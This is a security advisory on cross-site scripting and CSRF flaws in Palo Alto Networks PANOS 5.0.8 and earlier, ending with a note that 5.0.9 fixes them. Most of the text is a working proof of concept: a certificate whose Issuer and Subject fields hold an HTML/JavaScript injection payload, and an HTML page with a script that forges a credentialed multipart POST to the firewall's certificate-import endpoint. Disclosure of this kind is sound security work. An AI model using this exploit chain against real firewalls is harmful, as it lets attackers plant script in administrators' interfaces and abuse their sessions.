Palo Alto Networks PANOS <= 5.0.8 XSS

A couple of bugs exist in Palo Alto Networks PANOS <= 5.0.8 which can be exploited to conduct cross-site scripting attacks.

• Certificate fields are displayed in the firewall web interface without proper sanitization applied to them. This way it is possible to inject html into the web interface.
• Various file upload forms used by the firewall do not implement proper CSRF protection. import.certificate.php for example. 

Example of a certificate containing html that will be rendered:

Certificate:

    Data:

        Version: 1 (0x0)

        Serial Number:

            e5:67:53:d1:e4:2a:71:ec

        Signature Algorithm: sha1WithRSAEncryption

        Issuer: C=XX, ST=<style onload="javascript:alert(1)" />, L=Default City, O=Default Company Ltd

        Validity

            Not Before: Oct  1 16:28:18 2013 GMT

            Not After : Oct  1 16:28:18 2014 GMT

        Subject: C=XX, ST=<style onload="javascript:alert(1)" />, L=Default City, O=Default Company Ltd

        Subject Public Key Info:

            Public Key Algorithm: rsaEncryption

                Public-Key: (1024 bit)

                Modulus:

                    00:b1:d1:b4:9a:58:5e:20:99:15:03:f0:38:e5:dd:

                    11:f1:f1:14:26:3b:aa:6e:6b:c1:c1:28:01:be:d3:

                    93:e8:b5:fb:2e:a8:89:b2:87:56:93:54:60:a6:0c:

                    40:85:31:f8:9d:fd:00:0e:2f:f1:58:e6:a5:8a:0a:

                    67:57:70:06:13:02:2e:68:44:8b:a1:23:b1:bd:27:

                    d4:88:9d:f1:44:76:65:bb:e4:70:b5:fe:9c:21:57:

                    6a:11:df:56:b5:5d:c7:18:b9:b1:9a:81:c9:ae:80:

                    16:9d:11:76:e1:6f:a8:94:dd:01:02:c7:87:7e:cc:

                    b0:06:69:d5:84:79:64:45:d3

                Exponent: 65537 (0x10001)

    Signature Algorithm: sha1WithRSAEncryption

        03:12:b6:12:74:67:8f:ac:e0:5f:02:31:b3:63:10:78:33:9d:

        5e:c0:14:d9:d9:f6:ab:17:45:d3:fa:37:b8:c6:15:7c:24:a4:

        83:61:c6:8c:92:1d:2b:2b:0d:f9:84:79:e7:db:26:07:63:e4:

        9b:3a:3c:5f:a4:31:99:4e:79:30:95:a3:ce:86:9c:09:fa:e0:

        3d:7b:c1:c4:ec:7a:79:b3:9c:7f:e2:36:3e:f2:40:cf:c0:57:

        b0:4c:99:18:76:14:23:30:da:b3:90:2d:cd:af:65:80:bc:db:

        db:3f:9e:44:a1:2e:5e:e2:29:83:ff:29:ec:17:df:8f:7b:55:

        5d:ed

Example html source code to CSRF POST this rogue cert :

1. PA: <input type="text" id="url" value="https://10.10.10.22">
2. <input type=button onclick="upload()" value="Upload Certificate"/>
3. <hr>
4. <textarea rows=80 cols=80 id=text>
6. -----------------------------
7. Content-Disposition: form-data; name="ext-comp-2304"
9. on
10. -----------------------------
11. Content-Disposition: form-data; name="certFile"; filename="server.crt"
12. Content-Type: application/octet-stream
14. -----BEGIN CERTIFICATE-----
15. MIICXTCCAcYCCQDlZ1PR5Cpx7DANBgkqhkiG9w0BAQUFADBzMQswCQYDVQQGEwJY
16. WDEvMC0GA1UECAwmPHN0eWxlIG9ubG9hZD0iamF2YXNjcmlwdDphbGVydCgxKSIg
17. Lz4xFTATBgNVBAcMDERlZmF1bHQgQ2l0eTEcMBoGA1UECgwTRGVmYXVsdCBDb21w
18. YW55IEx0ZDAeFw0xMzEwMDExNjI4MThaFw0xNDEwMDExNjI4MThaMHMxCzAJBgNV
19. BAYTAlhYMS8wLQYDVQQIDCY8c3R5bGUgb25sb2FkPSJqYXZhc2NyaXB0OmFsZXJ0
20. KDEpIiAvPjEVMBMGA1UEBwwMRGVmYXVsdCBDaXR5MRwwGgYDVQQKDBNEZWZhdWx0
21. IENvbXBhbnkgTHRkMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCx0bSaWF4g
22. mRUD8Djl3RHx8RQmO6pua8HBKAG+05PotfsuqImyh1aTVGCmDECFMfid/QAOL/FY
23. 5qWKCmdXcAYTAi5oRIuhI7G9J9SInfFEdmW75HC1/pwhV2oR31a1XccYubGagcmu
24. gBadEXbhb6iU3QECx4d+zLAGadWEeWRF0wIDAQABMA0GCSqGSIb3DQEBBQUAA4GB
25. AAMSthJ0Z4+s4F8CMbNjEHgznV7AFNnZ9qsXRdP6N7jGFXwkpINhxoySHSsrDfmE
26. eefbJgdj5Js6PF+kMZlOeTCVo86GnAn64D17wcTsenmznH/iNj7yQM/AV7BMmRh2
27. FCMw2rOQLc2vZYC829s/nkShLl7iKYP/KewX3497VV3t
28. -----END CERTIFICATE-----
30. -----------------------------
31. Content-Disposition: form-data; name="ext-comp-2306"
33. Base64 Encoded Certificate (PEM)
34. -----------------------------
35. Content-Disposition: form-data; name="keyFile"; filename=""
36. Content-Type: application/octet-stream
39. -----------------------------
40. Content-Disposition: form-data; name="bImportCertificateSubmit"
42. OK
43. -----------------------------
44. Content-Disposition: form-data; name="certFileC"
46. server.crt
47. -----------------------------
48. Content-Disposition: form-data; name="vsysC"
50. shared
51. -----------------------------
52. Content-Disposition: form-data; name="passPhrase"
55. -----------------------------
56. Content-Disposition: form-data; name="keyFileC"
59. -----------------------------
60. Content-Disposition: form-data; name="certName"
62. TPOLLET
63. -----------------------------
64. Content-Disposition: form-data; name="format"
66. pem
67. -----------------------------
68. Content-Disposition: form-data; name="includekey"
71. -----------------------------
72. Content-Disposition: form-data; name="certType"
74. device
75. -----------------------------
76. Content-Disposition: form-data; name="template"
79. -------------------------------
80. </textarea>
82. <script>
83. function upload() {
84.   text = document.getElementById('text').value
85.   host = document.getElementById('url').value;
86.   url  = host + "/php/device/import.certificate.php";
87.   xhr  = new XMLHttpRequest();
88.   xhr.withCredentials = true;
89.   xhr.open("POST", url, true);
90.   xhr.setRequestHeader("Content-Type","multipart/form-data; boundary=---------------------------");
91.   xhr.send(text);
92.   alert('check ' + host + '/#device::vsys1::device/certificate-management/certificates' );
93. }
95. </script>

These issues have been fixed in PANOS 5.0.9, mentioned in the release notes like this:

57343—Fixed an issue that caused improper handling of imported certificates that contained HTML.